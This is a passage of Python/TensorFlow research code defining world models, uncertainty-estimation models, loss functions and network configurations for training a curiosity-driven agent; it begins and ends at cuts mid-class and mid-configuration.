self.act_loss = tf.reduce_mean(fut_loss_list)
self.fut_var_list = [var for var in tf.global_variables() if 'future_model' in var.name]
#adding on readouts
self.obj_there_loss = []
self.num_obj_there = []
self.obj_not_there_loss = []
self.object_there = []
obj_there_per_dim_list = []
avg_acc_obj_there = []
avg_acc_obj_not_there = []
for t in range(num_timesteps):
act_tv = self.action_post[:, t + act_back]
force_norm = tf.reduce_sum(act_tv[:, 2:] * act_tv[:, 2:], axis = 1, keep_dims = True)
obj_there = tf.cast(tf.greater(force_norm, .0001), tf.float32)
obj_there_per_dim = tf.tile(obj_there, [1, act_dim])
obj_there_per_dim_list.append(obj_there_per_dim)
# avg_acc_obj_there.append(tf.reduce_sum(obj_there_per_dim * acc_01_list[t], axis = 0) / tf.reduce_sum(obj_there))
# avg_acc_obj_not_there.append(tf.reduce_sum((1. - obj_there_per_dim) * acc_01_list[t], axis = 0) / tf.reduce_sum(1. - obj_there))
# self.obj_there_loss.append(tf.reduce_sum(obj_there * self.act_loss_per_example[t]) / tf.reduce_sum(obj_there))
# self.obj_not_there_loss.append(tf.reduce_sum((1. - obj_there) * self.act_loss_per_example[t]) / tf.reduce_sum(1. - obj_there))
self.num_obj_there.append(tf.reduce_sum(obj_there))
self.object_there.append(obj_there)
avg_acc_obj_there = sum([tf.reduce_sum(obj_there_per_dim_list[t] * acc_01_list[t], axis = 0)\
for t in range(num_timesteps)]) / sum([tf.reduce_sum(self.object_there[t]) for t in range(num_timesteps)])
avg_acc_obj_not_there = sum([tf.reduce_sum((1. - obj_there_per_dim_list[t]) * acc_01_list[t], axis = 0)\
for t in range(num_timesteps)]) / sum([tf.reduce_sum(1. - self.object_there[t]) for t in range(num_timesteps)])
self.obj_there_loss = sum([tf.reduce_sum(self.object_there[t] * self.act_loss_per_example[t], axis = 0)\
for t in range(num_timesteps)]) / sum([tf.reduce_sum(self.object_there[t]) for t in range(num_timesteps)])
self.obj_not_there_loss = sum([tf.reduce_sum((1. - self.object_there[t]) * self.act_loss_per_example[t], axis = 0)\
for t in range(num_timesteps)]) / sum([tf.reduce_sum(1. - self.object_there[t]) for t in range(num_timesteps)])
obj_there_fut_loss = sum([tf.reduce_sum(self.object_there[t] * self.fut_loss_per_example[t], axis = 0)\
for t in range(num_timesteps)]) / sum([tf.reduce_sum(self.object_there[t]) for t in range(num_timesteps)])
obj_not_there_fut_loss = sum([tf.reduce_sum((1. - self.object_there[t]) * self.fut_loss_per_example[t], axis = 0)\
for t in range(num_timesteps)]) / sum([tf.reduce_sum(1. - self.object_there[t]) for t in range(num_timesteps)])
self.readouts = {'act_pred' : self.act_pred, 'act_loss' : self.act_loss, 'fut_loss' : self.fut_loss,
'obj_there_loss_noprint' : self.obj_there_loss, 'obj_not_there_loss_noprint' : self.obj_not_there_loss,
'num_obj_there_noprint' : self.num_obj_there, 'acc_obj_there_noprint' : avg_acc_obj_there,
'acc_obj_not_there_noprint' : avg_acc_obj_not_there, 'obj_there_fut_loss_noprint' : obj_there_fut_loss,
'obj_not_there_fut_loss_noprint' : obj_not_there_fut_loss
}
self.save_to_gfs = ['act_pred']
class MSActionWorldModel(object):
def __init__(self, cfg):
num_timesteps = cfg['num_timesteps']
state_shape = list(cfg['state_shape'])
act_dim = cfg['act_dim']
t_per_state = state_shape[0]
states_shape = [num_timesteps + t_per_state] + state_shape[1:]
acts_shape = [num_timesteps + t_per_state - 1, act_dim]
self.states = tf.placeholder(tf.float32, [None] + states_shape)
self.action = tf.placeholder(tf.float32, [None] + acts_shape)
self.action_post = tf.placeholder(tf.float32, [None] + acts_shape)
self.act_loss_per_example = []
self.act_pred = []
act_loss_list = []
for t in range(num_timesteps):
s_i = self.states[:, t: t + t_per_state]
if t == 0:
self.s_i = s_i
s_f = self.states[:, t + 1 : t + 1 + t_per_state]
act_given = self.action[:, t : t + t_per_state - 1]
act_tv = self.action_post[:, t + t_per_state - 1]
inputs = {'s_i' : s_i, 's_f' : s_f, 'act_given' : act_given, 'act_tv' : act_tv}
outputs = get_action_model(inputs, cfg, reuse_weights = (t > 0))
self.act_loss_per_example.append(outputs['act_loss_per_example'])
act_loss_list.append(outputs['act_loss'])
self.act_pred.append(outputs['pred'])
self.act_loss = tf.reduce_mean(act_loss_list)
self.act_var_list = [var for var in tf.global_variables() if 'action_model' in var.name or 'before_action' in var.name]
self.encode_var_list = [var for var in tf.global_variables() if 'encode_model' in var.name]
class LatentSpaceWorldModel(object):
def __init__(self, cfg):
#states shape has one more timestep, because we have given and future times, shoved into gpu once, and then we cut it up
states_shape = list(cfg['state_shape'])
states_shape[0] += 1
self.states = tf.placeholder(tf.float32, [None] + states_shape)
self.s_i = s_i = self.states[:, :-1]
self.s_f = s_f = self.states[:, 1:]
self.action = tf.placeholder(tf.float32, [None] + cfg['action_shape'])
self.encode_var_list = []
self.action_post = tf.placeholder(tf.float32, [None] + cfg['action_shape'])
#flatten out time dim
s_i = tf_concat([s_i[:, i] for i in range(cfg['state_shape'][0])], 3)
s_f = tf_concat([s_f[:, i] for i in range(cfg['state_shape'][0])], 3)
s_i = postprocess_std(s_i)
s_f = postprocess_std(s_f)
m = ConvNetwithBypasses()
with tf.variable_scope('encode_model'):
s_i = feedforward_conv_loop(s_i, m, cfg['encode'], desc = 'encode', bypass_nodes = None, reuse_weights = False, batch_normalize = False, no_nonlinearity_end = False)[-1]
s_f = feedforward_conv_loop(s_f, m, cfg['encode'], desc = 'encode', bypass_nodes = None, reuse_weights = True, batch_normalize = False, no_nonlinearity_end = False)[-1]
self.encoding_i = s_i
self.encoding_f = s_f
enc_i_flat = flatten(s_i)
enc_f_flat = flatten(s_f)
act_flat = flatten(self.action)
act_loss_factor = cfg['action_model'].get('loss_factor', 1.)
fut_loss_factor = cfg['future_model'].get('loss_factor', 1.)
#action model time
with tf.variable_scope('action_model'):
loss_type = cfg['action_model'].get('loss_type', 'both_l2')
include_prev_action = cfg['action_model'].get('include_previous_action', False)
to_concat = [enc_i_flat, enc_f_flat]
if include_prev_action:
print('including previous action!')
to_concat.append(self.action[:, 0])
encoded_concat = tf_concat(to_concat, 1)
self.act_pred = hidden_loop_with_bypasses(encoded_concat, m, cfg['action_model']['mlp'], reuse_weights = False, train = True)
if loss_type == 'both_l2':
act_post_flat = flatten(self.action_post)
diff = self.act_pred - act_post_flat
self.act_loss_per_example = tf.reduce_sum(diff * diff, axis = 1, keep_dims = True) / 2. * act_loss_factor
self.act_loss = tf.reduce_mean(self.act_loss_per_example)
elif loss_type == 'one_l2':
act_post_flat = self.action_post[:, -1]
diff = self.act_pred - act_post_flat
self.act_loss_per_example = tf.reduce_sum(diff * diff, axis = 1, keep_dims = True) / 2. * act_loss_factor
self.act_loss = tf.reduce_mean(self.act_loss_per_example)
elif loss_type == 'one_cat':
print('cat')
num_classes = cfg['action_model']['num_classes']
act_post_flat = self.action_post[:, -1]
self.act_loss_per_example, self.act_loss = action_softmax_loss(self.act_pred, act_post_flat, num_classes = num_classes)
else:
raise Exception('loss type not recognized!')
#future model time
enc_shape = enc_f_flat.get_shape().as_list()
with tf.variable_scope('future_model'):
fut_input = tf_concat([enc_i_flat, act_flat], 1)
forward = hidden_loop_with_bypasses(fut_input, m, cfg['future_model']['mlp'], reuse_weights = False, train = True)
if 'deconv' in cfg['future_model']:
reshape_dims = cfg['future_model']['reshape_dims']
forward = tf.reshape(forward, [-1] + reshape_dims)
decoding = deconv_loop(
forward, m, cfg['future_model']['deconv'], desc='deconv',
bypass_nodes = [self.encoding_i], reuse_weights = False,
batch_normalize = False,
do_print = True)
self.fut_pred = decoding[-1]
tv_flat = flatten(self.encoding_f)
# self.fut_loss = tf.nn.l2_loss(self.encoding_f - self.fut_pred)
else:
self.fut_pred = forward
tv_flat = enc_f_flat
# self.fut_loss = tf.nn.l2_loss(enc_f_flat - self.fut_pred)
#different formula for l2 loss now because we need per-example details
pred_flat = flatten(self.fut_pred)
diff = pred_flat - tv_flat
self.fut_loss_per_example = tf.reduce_sum(diff * diff, axis = 1, keep_dims = True) / 2. * fut_loss_factor
self.fut_loss = tf.reduce_mean(self.fut_loss_per_example)
self.act_var_list = [var for var in tf.global_variables() if 'action_model' in var.name]
self.fut_var_list = [var for var in tf.global_variables() if 'future_model' in var.name]
self.encode_var_list = [var for var in tf.global_variables() if 'encode_model' in var.name]
hourglass_latent_model_cfg = {
'state_shape' : [2, 64, 64, 3],
'action_shape' : [2, 8],
'encode' : {
'encode_depth' : 4,
'encode' : {
1: {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 32}},
2: {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 32}},
3: {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 32}},
4: {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 8}}
}
},
'action_model' : {
'mlp' : {
'hidden_depth' : 2,
'hidden' : {
1: {'num_features' : 256},
2: {'num_features' : 16, 'activation' : 'identity'}
}
}
},
'future_model' : {
'mlp' : {
'hidden_depth' : 2,
'hidden' : {
1: {'num_features' : 256},
2: {'num_features' : 128, 'activation' : 'identity'}
}
},
'reshape_dims' : [4, 4, 8],
'deconv' : {
'deconv_depth' : 3,
'deconv' : {
1 : {'deconv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 16}, 'bypass' : 0},
2 : {'deconv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 16}, 'bypass' : 0},
3 : {'deconv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 8}, 'bypass' : 0}
}
}
}
}
mario_world_model_config = {
'state_shape' : [2, 64, 64, 3],
'action_shape' : [2, 8],
'encode' : {
'encode_depth' : 4,
'encode' : {
1: {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 32}},
2: {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 32}},
3: {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 32}},
4: {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 32}}
}
},
'action_model' : {
'mlp' : {
'hidden_depth' : 2,
'hidden' : {
1: {'num_features' : 256},
2: {'num_features' : 16, 'activation' : 'identity'}
}
}
},
'future_model' : {
'mlp' : {
'hidden_depth' : 2,
'hidden' : {
1: {'num_features' : 512},
2: {'num_features' : 512, 'activation' : 'identity'}
}
}
}
}
class MixedUncertaintyModel:
'''For both action and future uncertainty prediction, simultaneously, as separate predictions.
Consider merging with UncertaintyModel, but right now that might look too messy. Want to leave that functionality alone.
'''
def __init__(self, cfg):
with tf.variable_scope('uncertainty_model'):
self.s_i = x = tf.placeholder(tf.float32, [None] + cfg['state_shape'])
self.action_sample = ac = tf.placeholder(tf.float32, [None, cfg['action_dim']])
self.true_act_loss = tf.placeholder(tf.float32, [None])
self.true_fut_loss = tf.placeholder(tf.float32, [None])
m = ConvNetwithBypasses()
x = postprocess_depths(x)
#concat temporal dims into channels
x = tf_concat([x[:, i] for i in range(cfg['state_shape'][0])], 3)
self.encoded = x = feedforward_conv_loop(x, m, cfg['encode'], desc = 'encode', bypass_nodes = None, reuse_weights = False, batch_normalize = False, no_nonlinearity_end = False)[-1]
x = flatten(x)
x = tf.cond(tf.equal(tf.shape(self.action_sample)[0], cfg['n_action_samples']), lambda : tf.tile(x, [cfg['n_action_samples'], 1]), lambda : x)
fc_inputs = tf_concat([x, ac], 1)
self.estimated_act_loss = hidden_loop_with_bypasses(fc_inputs, m, cfg['act_mlp'], reuse_weights = False, train = True)
self.estimated_fut_loss = hidden_loop_with_bypasses(fc_inpits, m, cfg['fut_mlp'], reuse_weights = False, train = True)
#TODO FINISH
def get_mixed_loss(world_model, weighting, multistep = False):
print(weighting.keys())
print('in the loss maker!')
print(world_model.act_loss_per_example)
print(world_model.fut_loss_per_example)
if multistep:
return [weighting['action'] * l_a + weighting['future'] * l_f for l_a, l_f in zip(world_model.act_loss_per_example, world_model.fut_loss_per_example)]
return weighting['action'] * world_model.act_loss_per_example + weighting['future'] * world_model.fut_loss_per_example
def get_obj_there(world_model):
return world_model.obj_there
def get_force_square(world_model):
return world_model.square_force_magnitude
class ObjectThereWorldModel:
'''
A dummy oracle world model that just says the true value of whether an object is in the field of view.
'''
def __init__(self, cfg):
print(cfg.keys())
states_shape = list(cfg['state_shape'])
states_shape[0] += 1
self.states = tf.placeholder(tf.float32, [None] + states_shape)
self.s_i = s_i = self.states[:, :-1]
self.s_f = s_f = self.states[:, 1:]
self.action = tf.placeholder(tf.float32, [None] + cfg['action_shape'])
self.obj_there = tf.placeholder(tf.int32, [None])
class ForceMagSquareWorldModel:
'''
Similar to the above, but just gives the square of the force.
'''
def __init__(self, cfg):
states_shape = list(cfg['state_shape'])
states_shape[0] += 1
self.states = tf.placeholder(tf.float32, [None] + states_shape)
self.s_i = s_i = self.states[:, :-1]
self.s_f = s_f = self.states[:, 1:]
self.action = tf.placeholder(tf.float32, [None] + cfg['action_shape'])
self.action_post = tf.placeholder(tf.float32, [None] + cfg['action_shape'])
force = self.action_post[:, -1, 2:]
self.square_force_magnitude = tf.reduce_sum(force * force, axis = 1, keep_dims = True) / 2.
class SimpleForceUncertaintyModel:
def __init__(self, cfg, world_model):
with tf.variable_scope('uncertainty_model'):
m = ConvNetwithBypasses()
self.action_sample = ac = world_model.action[:, -1]
self.true_loss = world_model.square_force_magnitude
self.obj_there = x = tf.placeholder(tf.int32, [None])
x = tf.cast(x, tf.float32)
x = tf.expand_dims(x, 1)
self.oh_my_god = x = x * ac * ac
self.ans = tf.reduce_sum(x[:, 2:], axis = 1)
if cfg.get('use_ans', False):
x = self.ans
x = tf.expand_dims(x, 1)
self.estimated_world_loss = tf.squeeze(hidden_loop_with_bypasses(x, m, cfg, reuse_weights = False, train = True))
self.uncertainty_loss = l2_loss(self.true_loss, self.estimated_world_loss, {'loss_factor' : 1 / 32.})
self.rng = np.random.RandomState(0)
self.var_list = [var for var in tf.global_variables() if 'uncertainty_model' in var.name]
def act(self, sess, action_sample, state):
chosen_idx = self.rng.randint(len(action_sample))
return action_sample[chosen_idx], -1., None
def objthere_signal(world_model):
return world_model.obj_there_supervision
class MSExpectedUncertaintyModel:
def __init__(self, cfg, world_model):
with tf.variable_scope('uncertainty_model'):
self.step = tf.get_variable('um_step', [], tf.int32, initializer = tf.constant_initializer(0,dtype = tf.int32))
m = ConvNetwithBypasses()
self.s_i = x = world_model.s_i
if 'loss_signal_func' in cfg:
self.true_loss = cfg['loss_signal_func'](world_model, **cfg['loss_signal_kwargs'])
else:
self.true_loss = world_model.act_loss_per_example
n_timesteps = len(world_model.act_loss_per_example)
t_per_state = self.s_i.get_shape().as_list()[1]
#the action it decides on is the first action giving a transition from the starting state.
self.action_sample = ac = world_model.action_for_um
#should also really include some past actions
#encoding
x = tf.cast(x, tf.float32)
postprocess_method = cfg.get('postprocess')
if postprocess_method == 'depths1':
x = postprocess_depths(x)
elif postprocess_method == 'images1':
print('POSTPROCESSING AS IMAGES')
x = postprocess_std(x)
else:
assert postprocess_method is None
x = tf_concat([x[:, i] for i in range(t_per_state)], 3)
if cfg.get('use_wm_encoding', False):
self.encoded = world_model.encoding_for_um
else:
self.encoded = x = feedforward_conv_loop(x, m, cfg['shared_encode'], desc = 'encode', bypass_nodes = None, reuse_weights = False, batch_normalize = False, no_nonlinearity_end = False)[-1]
#choke down
x = flatten(x)
with tf.variable_scope('before_action'):
x = hidden_loop_with_bypasses(x, m, cfg['shared_mlp_before_action'], reuse_weights = False, train = True)
#if we are computing the uncertainty map for many action samples, tile to use the same encoding for each action
x = tf.cond(tf.equal(tf.shape(self.action_sample)[0], cfg['n_action_samples']), lambda : tf.tile(x, [cfg['n_action_samples'], 1]), lambda : x)
#concatenate action
x = tf_concat([x, ac], 1)
#shared mlp after action
if 'shared_mlp' in cfg:
with tf.variable_scope('shared_mlp'):
x = hidden_loop_with_bypasses(x, m, cfg['shared_mlp'], reuse_weights = False, train = True)
#split mlp per prediction
self.estimated_world_loss = []
for t in range(n_timesteps):
with tf.variable_scope('split_mlp' + str(t)):
self.estimated_world_loss.append(hidden_loop_with_bypasses(x, m, cfg['mlp'][t], reuse_weights = False, train = True))
self.loss_per_example, self.loss_per_step, self.uncertainty_loss = cfg['loss_func'](self.true_loss, self.estimated_world_loss, cfg)
#for now, just implementing a random policy
self.just_random = False
if 'just_random' in cfg:
self.just_random = True
self.rng = np.random.RandomState(cfg['just_random'])
self.var_list = [var for var in tf.global_variables() if 'uncertainty_model' in var.name]
#a first stab at a policy based on this uncertainty estimation
if cfg.get('weird_old_score', False):
tot_est = sum(self.estimated_world_loss)
tot_est_shape = tot_est.get_shape().as_list()
assert len(tot_est_shape) == 2
n_classes = tot_est_shape[1]
expected_tot_est = sum([tot_est[:, i:i+1] * float(i) for i in range(n_classes)])
else:
probs_per_timestep = [tf.nn.softmax(logits) for logits in self.estimated_world_loss]
n_classes = probs_per_timestep[0].get_shape().as_list()[-1]
expected_class_per_timestep = [sum([probs[:, i:i+1] * float(i) for i in range(n_classes)]) for probs in probs_per_timestep]
expected_tot_est = sum(expected_class_per_timestep)
#heat setup
if 'heat_func' in cfg:
assert 'heat' not in cfg
heat = cfg['heat_func'](self.step, ** cfg['heat_params'])
else:
heat = tf.constant(cfg.get('heat', 1.), dtype = tf.float32)
x = tf.transpose(expected_tot_est) / heat
self.sample = categorical_sample(x, cfg['n_action_samples'], one_hot = False)
#add readouts
self.obj_there_avg_pred = []
self.obj_not_there_avg_pred = []
self.obj_there_loss = []
self.obj_not_there_loss = []
#only care about if object is there the first time
obj_there = tf.tile(world_model.object_there[0], [1, n_classes])
obj_there_for_per_example_case = tf.squeeze(world_model.object_there[0])
for t in range(n_timesteps):
self.obj_there_avg_pred.append(float(n_classes) * tf.reduce_sum(obj_there * probs_per_timestep[t], axis = 0) / tf.reduce_sum(obj_there))
self.obj_not_there_avg_pred.append(float(n_classes) * tf.reduce_sum((1. - obj_there)\
* probs_per_timestep[t], axis = 0) / tf.reduce_sum(1. - obj_there))
self.obj_there_loss.append(tf.reduce_sum(obj_there_for_per_example_case * self.loss_per_example[t]) / tf.reduce_sum(obj_there_for_per_example_case))
self.obj_not_there_loss.append(tf.reduce_sum((1. - obj_there_for_per_example_case)\
* self.loss_per_example[t]) / tf.reduce_sum(1. - obj_there_for_per_example_case))
self.readouts = {'estimated_world_loss' : self.estimated_world_loss, 'um_loss' : self.uncertainty_loss,
'loss_per_example' : self.true_loss, 'obj_not_there_avg_pred_noprint' : self.obj_not_there_avg_pred,
'obj_there_avg_pred_noprint' : self.obj_there_avg_pred, 'um_action_given' : self.action_sample,
'um_obj_there_loss_noprint' : self.obj_there_loss, 'um_obj_not_there_loss_noprint' : self.obj_not_there_loss, 'heat' : heat}
for j, l in enumerate(self.loss_per_step):
self.readouts['um_loss' + str(j)] = l
self.save_to_gfs = ['estimated_world_loss', 'loss_per_example', 'um_action_given']
def act(self, sess, action_sample, state):
#this should eventually implement a policy, for now uniformly random, but we still want that sweet estimated world loss.
depths_batch = np.array([state])
if self.just_random:
ewl = sess.run(self.estimated_world_loss, feed_dict = {self.s_i : depths_batch, self.action_sample : action_sample})
chosen_idx = self.rng.randint(len(action_sample))
return action_sample[chosen_idx], -1., ewl
chosen_idx, ewl = sess.run([self.sample, self.estimated_world_loss], feed_dict = {self.s_i : depths_batch, self.action_sample : action_sample})
chosen_idx = chosen_idx[0]
act = action_sample[chosen_idx]
return act, -1., ewl
def stopping_exponential_decay(step, start_value = 1000., end_value = 5e-1, time_to_get_there = 100000):
step_flt = tf.cast(step, tf.float32)
frac_there = step_flt / float(time_to_get_there)
raw_decay = tf.exp(np.log(start_value) * (1. - frac_there) + np.log(end_value) * frac_there)
return tf.maximum(raw_decay, end_value)
class UncertaintyModel:
def __init__(self, cfg, world_model):
um_scope = cfg.get('scope_name', 'uncertainty_model')
with tf.variable_scope(um_scope):
m = ConvNetwithBypasses()
self.action_sample = ac = world_model.action[:, -1]
self.s_i = x = world_model.s_i
if cfg.get('only_model_ego', False):
ac = ac[:, :2]
self.true_loss = tr_loss = cfg['wm_loss']['func'](world_model, **cfg['wm_loss']['kwargs'])
print('true loss here')
print(self.true_loss)
print(cfg['wm_loss']['func'])
assert len(self.true_loss.get_shape().as_list()) == 2
if cfg.get('use_world_encoding', False):
self.encoded = x = world_model.encoding_i
else:
x = self.s_i
x = postprocess_depths(x)
#concatenate temporal dimension into channels
x = tf_concat([x[:, i] for i in range(x.get_shape().as_list()[1])], 3)
#encode
self.encoded = x = feedforward_conv_loop(x, m, cfg['encode'], desc = 'encode', bypass_nodes = None, reuse_weights = False, batch_normalize = False, no_nonlinearity_end = False)[-1]
x = flatten(x)
#this could be done fully conv, but we would need building blocks modifications, this is just as easy
#applies an mlp to encoding before adding in actions
if 'mlp_before_action' in cfg:
with tf.variable_scope('before_action'):
print('got to before action!')
x = hidden_loop_with_bypasses(x, m, cfg['mlp_before_action'], reuse_weights = False, train = True)
x = tf.cond(tf.equal(tf.shape(self.action_sample)[0], cfg['n_action_samples']), lambda : tf.tile(x, [cfg['n_action_samples'], 1]), lambda : x)
# x = tf.tile(x, [cfg['n_action_samples'], 1])
self.insert_obj_there = cfg.get('insert_obj_there', False)
if self.insert_obj_there:
print('inserting obj_there')
self.obj_there = x = tf.placeholder(tf.int32, [None])
x = tf.cast(x, tf.float32)
x = tf.expand_dims(x, 1)
self.exactly_whats_needed = cfg.get('exactly_whats_needed', False)
if self.insert_obj_there and self.exactly_whats_needed:
print('exactly_whats_needed nonlinearity')
self.oh_my_god = x = x * ac * ac
print(x.get_shape().as_list())
else:
x = tf_concat([x, ac], 1)
print('going into last hidden loop')
self.estimated_world_loss = x = hidden_loop_with_bypasses(x, m, cfg['mlp'], reuse_weights = False, train = True)
x_tr = tf.transpose(x)
heat = cfg.get('heat', 1.)
x_tr /= heat
#need to think about how to handle this
if x_tr.get_shape().as_list()[0] > 1:
x_tr = x_tr[1:2]
prob = tf.nn.softmax(x_tr)
log_prob = tf.nn.log_softmax(x_tr)
self.entropy = - tf.reduce_sum(prob * log_prob)
self.sample = categorical_sample(x_tr, cfg['n_action_samples'], one_hot = False)
print('true loss!')
print(self.true_loss)
self.uncertainty_loss = cfg['loss_func'](self.true_loss, self.estimated_world_loss, cfg)
self.just_random = False
if 'just_random' in cfg:
self.just_random = True
self.rng = np.random.RandomState(cfg['just_random'])
self.var_list = [var for var in tf.global_variables() if um_scope in var.name]
print([var.name for var in self.var_list])
def act(self, sess, action_sample, state):
if self.just_random and self.insert_obj_there:
#a bit hackish, hopefully breaks nothing
chosen_idx = self.rng.randint(len(action_sample))
return action_sample[chosen_idx], -1., None
depths_batch = np.array([state])
chosen_idx, entropy, estimated_world_loss = sess.run([self.sample, self.entropy, self.estimated_world_loss],
feed_dict = {self.s_i : depths_batch, self.action_sample : action_sample})
chosen_idx = chosen_idx[0]
if self.just_random:
chosen_idx = self.rng.randint(len(action_sample))
return action_sample[chosen_idx], entropy, estimated_world_loss
def l2_loss(tv, pred, cfg):
return tf.nn.l2_loss(tv - pred) * cfg.get('loss_factor', 1.)
def categorical_loss(tv, pred, cfg):
return tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(
labels = tv, logits = pred)) * cfg.get('loss_factor', 1.)
def correlation(x, y):
x = tf.reshape(x, (-1,))
y = tf.reshape(y, (-1,))
n = tf.cast(tf.shape(x)[0], tf.float32)
x_sum = tf.reduce_sum(x)
y_sum = tf.reduce_sum(y)
xy_sum = tf.reduce_sum(tf.multiply(x, y))
x2_sum = tf.reduce_sum(tf.pow(x, 2))
y2_sum = tf.reduce_sum(tf.pow(y, 2))
numerator = tf.scalar_mul(n, xy_sum) - tf.scalar_mul(x_sum, y_sum) + .0001
denominator = tf.sqrt(tf.scalar_mul(tf.scalar_mul(n, x2_sum) - tf.pow(x_sum, 2),
tf.scalar_mul(n, y2_sum) - tf.pow(y_sum, 2))) + .0001
corr = tf.truediv(numerator, denominator)
return corr
def combination_loss(tv, pred, cfg):
l2_coef = cfg.get('l2_factor', 1.)
corr_coef = cfg.get('corr_factor', 1.)
return l2_coef * tf.nn.l2_loss(pred - tv) - corr_coef * (correlation(pred, tv) - 1)
def bin_values(values, thresholds):
for i, th in enumerate(thresholds):
if i == 0:
lab = tf.cast(tf.greater(values, th), tf.int32)
else:
lab += tf.cast(tf.greater(values, th), tf.int32)
return lab
def binned_softmax_loss_per_example(tv, prediction, cfg):
thresholds = cfg['thresholds']
n_classes = len(thresholds) + 1
tv_shape = tv.get_shape().as_list()
d = tv_shape[1]
assert len(tv_shape) == 2
tv = bin_values(tv, thresholds)
prediction = tf.reshape(prediction, [-1, d, n_classes])
loss_per_example = tf.nn.sparse_softmax_cross_entropy_with_logits(labels = tv, logits = prediction) * cfg.get('loss_factor', 1.)
loss_per_example = tf.reduce_mean(loss_per_example, axis = 1, keep_dims = True)
print('per example!')
print(loss_per_example.get_shape().as_list())
loss = tf.reduce_mean(loss_per_example)
return loss_per_example, loss
def binned_01_accuracy_per_example(tv, prediction, cfg):
thresholds = cfg['thresholds']
n_classes = len(thresholds) + 1
tv_shape = tv.get_shape().as_list()
d = tv_shape[1]
assert(len(tv_shape)) == 2
tv = bin_values(tv, thresholds)
prediction = tf.reshape(prediction, [-1, d, n_classes])
hardmax = tf.cast(tf.argmax(prediction, axis = -1), tf.int32)
correct_answers = tf.cast(tf.equal(hardmax, tv), tf.int32)
return correct_answers
def binned_softmax_loss_per_example_w_weights(tv, prediction, cfg):
thresholds = cfg['thresholds']
loss_weights = cfg['loss_weights']
print('using softmax loss with weights')
print(loss_weights)
n_classes = len(thresholds) + 1
tv_shape = tv.get_shape().as_list()
d = tv_shape[1]
assert len(tv_shape) == 2
tv = bin_values(tv, thresholds)
prediction = tf.reshape(prediction, [-1, d, n_classes])
loss_per_example_per_dim = [tf.nn.sparse_softmax_cross_entropy_with_logits(labels = tv[:, dim_num : dim_num + 1], logits = prediction[:, dim_num : dim_num + 1]) * cfg.get('loss_factor', 1.) * loss_weights[dim_num] for dim_num in range(d)]
loss_per_example = sum(loss_per_example_per_dim) / float(d)
loss = tf.reduce_mean(loss_per_example)
return loss_per_example, loss
def binned_softmax_loss(tv, prediction, cfg):
thresholds = cfg['thresholds']
tv = bin_values(tv, thresholds)
tv = tf.squeeze(tv)
loss_per_example = tf.nn.sparse_softmax_cross_entropy_with_logits(labels = tv, logits = prediction)
loss = tf.reduce_mean(loss_per_example) * cfg.get('loss_factor', 1.)
return loss_per_example, loss
def softmax_loss(tv, prediction, cfg):
tv = tf.squeeze(tv)
print('in loss func')
print(tv)
loss_per_example = tf.nn.sparse_softmax_cross_entropy_with_logits(labels = tv, logits = prediction)
loss = tf.reduce_mean(loss_per_example) * cfg.get('loss_factor', 1.)
return loss_per_example, loss
def ms_sum_binned_softmax_loss(tv, prediction, cfg):
assert len(tv) == len(prediction)
loss_per_example_and_step = [binned_softmax_loss(y, p, cfg) for y, p in zip(tv, prediction)]
loss_per_example = [lpe for lpe, lps in loss_per_example_and_step]
loss_per_step = [lps for lpe, lps in loss_per_example_and_step]
loss = tf.reduce_mean(loss_per_step)
return loss_per_example, loss_per_step, loss
def objthere_loss(tv, prediction, cfg):
assert len(prediction) == 1
prediction_time1 = prediction[0]
print('in objthere loss')
print(tv)
loss_per_ex_and_step = [softmax_loss(tv, prediction_time1, cfg)]
loss_per_example = [lpe for lpe, lps in loss_per_ex_and_step]
loss_per_step = [lps for lpe, lps in loss_per_ex_and_step]
loss = tf.reduce_mean(loss_per_step)
return loss_per_example, loss_per_step, loss
def equal_spacing_softmax_loss(tv, prediction, cfg):
num_classes = cfg.get('num_classes', 2)
min_value = cfg.get('min_value', -1.)
max_value = cfg.get('max_value', 1.)
tv_shape = tv.get_shape().as_list()
#pred = tf.reshape(prediction, [-1] + tv_shape[1:] + [num_classes])
pred = prediction
tv = float(num_classes - 1) * (tv - min_value) / (max_value - min_value)
print('squeezing')
print(tv)
tv = tf.squeeze(tf.cast(tv, tf.int32))
print(tv)
print(pred)
loss_per_example = tf.nn.sparse_softmax_cross_entropy_with_logits(
labels = tv, logits = pred)
loss = tf.reduce_mean(loss_per_example) * cfg.get('loss_factor', 1.)
return loss
sample_cfg = {
'uncertainty_model' : {
'state_shape' : [2, 64, 64, 3],
'action_dim' : 8,
'n_action_samples' : 50,
'encode' : {
'encode_depth' : 3,
'encode' : {
1 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 10}},
2 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 10}},
3 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 5}},
}
},
'mlp' : {
'hidden_depth' : 2,
'hidden' : {1 : {'num_features' : 20, 'dropout' : .75},
2 : {'num_features' : 1, 'activation' : 'identity'}
}
}
},
'world_model' : sample_depth_future_cfg,
'seed' : 0
}
another_sample_cfg = {
'uncertainty_model' : {
'state_shape' : [2, 64, 64, 3],
'action_dim' : 8,
'n_action_samples' : 50,
'encode' : {
'encode_depth' : 5,
'encode' : {
1 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 20}},
2 : {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 20}},
3 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 20}},
4 : {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 10}},
5 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 5}},
}
},
'mlp' : {
'hidden_depth' : 2,
'hidden' : {1 : {'num_features' : 20, 'dropout' : .75},
2 : {'num_features' : 1, 'activation' : 'identity'}
}
}
},
'world_model' : a_bigger_depth_future_config,
'seed' : 0
}
default_damian_full_cfg = {
'uncertainty_model' : {
